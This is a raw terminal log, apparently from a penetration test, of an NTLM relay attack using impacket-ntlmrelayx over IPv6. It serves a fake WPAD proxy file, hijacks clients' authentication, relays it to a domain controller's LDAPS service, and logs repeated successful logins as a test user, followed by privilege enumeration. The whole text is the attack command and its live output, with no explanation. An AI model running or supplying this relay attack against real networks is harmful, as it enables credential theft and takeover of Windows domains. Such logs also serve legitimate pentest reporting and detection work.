impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.xx.1xx
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:1xx.xx.xx.xx, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.x.xx
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
<--snip-->